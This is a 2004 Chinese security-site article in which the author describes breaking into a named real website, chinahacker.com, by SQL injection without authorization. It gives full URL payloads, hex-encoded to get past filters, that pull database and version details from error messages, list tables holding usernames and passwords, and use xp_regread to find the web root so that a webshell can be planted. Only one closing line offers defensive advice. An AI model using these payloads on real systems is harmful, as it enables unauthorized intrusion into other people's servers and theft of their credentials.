首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
最后的战役--[第三次注入中国黑客联盟]
来源:vfocus.net 作者:小生 发布时间:2004-07-12  

最后的战役--[第三次注入中国黑客联盟]

文:小生


帮黑夜找一个工具,又去了黑客基地看了一眼,我晕,又是枫三少的照片挂在上面(n年前就是这样了,三少,挂照片好爽?^-^),我倒!看看黑基有什么注入漏洞先。我找啊找,找到了论坛。看到一个叫《[原创]对中国黑客联盟的二次渗透》,是某人写的。我直觉告诉我,这个什么中国黑客联盟应该还有漏洞(别丢鸡蛋,我很少去这样的站)。已经被人黑了2次了,也不差我了吧。我再来!


地址http://www.chinahacker.com/article/list.asp?id=891,测试开始吧。


测试一:http://www.chinahacker.com/article/list.asp?id=891’


返回:你提交的数据有错,不要老喜欢搞我啦,Kender留言


个人判断:过滤了’


测试二:http://www.chinahacker.com/article/list.asp?id=891%20and%201=1

返回:正常


个人判断:应该可以去死了,只过滤了’。


而且是mssql的数据库,我最喜欢。然后我想可能还过滤了select之类的吧。这次真是好玩。我想了想用16进制,这里我用了一个工具,是裤衩写的HEXSQL。由于枫三少已经写了有article表了,我是一个很懒的人。提交如下:http://www.chinahacker.com/article/list.asp?id=891%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30


其实就是http://www.chinahacker.com/article/list.asp?id=891 and (select count(*) from article)>0


返回正常,我是个很喜欢drop表的人来的。看看;能不能先
http://www.chinahacker.com/article/list.asp?id=891;
oh,shit,过滤了。再来一下先。
http://www.chinahacker.com/article/list.asp?id=891%3B,又可以了。


提醒黑客联盟一下吧。这里更好玩!http://www.chinahacker.com/soft/show.asp?id=401%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30


玩认真的了。


连接用户:
%20and%20%75%73%65%72%3E%30代表 and user>0
返回[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'ChinaHacker.com.Article' 转换为数据类型为 int 的列时发生语法错误。
Sql信息:


%20and%20%31%3D%28%73%65%6C%65%63%74%20%40%40%56%45%52%53%49%4F%4E%29 代表 and 1=(select @@VERSION)


返回[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。


用户权限:


省略n个测试,反正不是sa权限。


接下来是暴表,暴字段。这里我要感谢一个人,小竹。暴表就舒服多了啊。用不着慢慢猜。
一暴有这样的表wodoubuzhidaoshuoshenmehao。字段名id,username,password。就差不多了,继续暴,我是很懒的人来的。不会一个一个去猜的。


不如backup a webshell 吧。


得到库名为ChinaHacker.com.Article


创建一个表先http://www.chinahacker.com/article/list.asp?id=891%3B%63%72%65%61%74%65%20%74%61%62%6C%65%20%5B%64%62%6F%5D%2E%5B%78%62%6C%75%65%5D%20%28%5B%35%34%62%6F%62%5D%5B%63%68%61%72%5D%28%32%35%35%29%29%3B%2D%2D


到绝对路径了


http://www.chinahacker.com/article/list.asp?id=891%3B%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%45%58%45%43%20%6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%6F%6E%74%72%6F%6C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%2C%20%40%72%65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%78%62%6C%75%65%20%28%35%34%62%6F%62%29%20%76%61%6C%75%65%73%28%40%72%65%73%75%6C%74%29%3B%2D%2D


得到绝对路径为:d:\chinahacker


有个notdown表啊,小路帮我drop了,果然是老手,我还没有想到,小路简直是我偶像,要多多向他学习一下才行。这里要谢谢小路对我的帮忙,谢谢了。


这次纯粹是为了玩,没有drop表,没有update文章系统。Kender不要找我麻烦。我怕怕。


我认为,想防止再发生的话。最好就让数字只能是数字好了,搜索那里过滤就照原来一样。具体可以看看小竹的《SQL注入天书 - ASP注入漏洞全接触》的最后那部分的防范处理



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·对cfm的一个攻击实例
·脚本图片类后门的完美使用方法实
·windows POSIX 子系统权限提升漏
·跨站式SQL注入
·Advanced SQL Injection with My
·动网论坛7.0获得WebShell的分析
·突破常规限制运行asp木马
·注入下载文件的代码到IE进程然后
·分析盛大被黑
·脚本后门的深入
·对iis写权限的利用
·提升asp木马权限
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved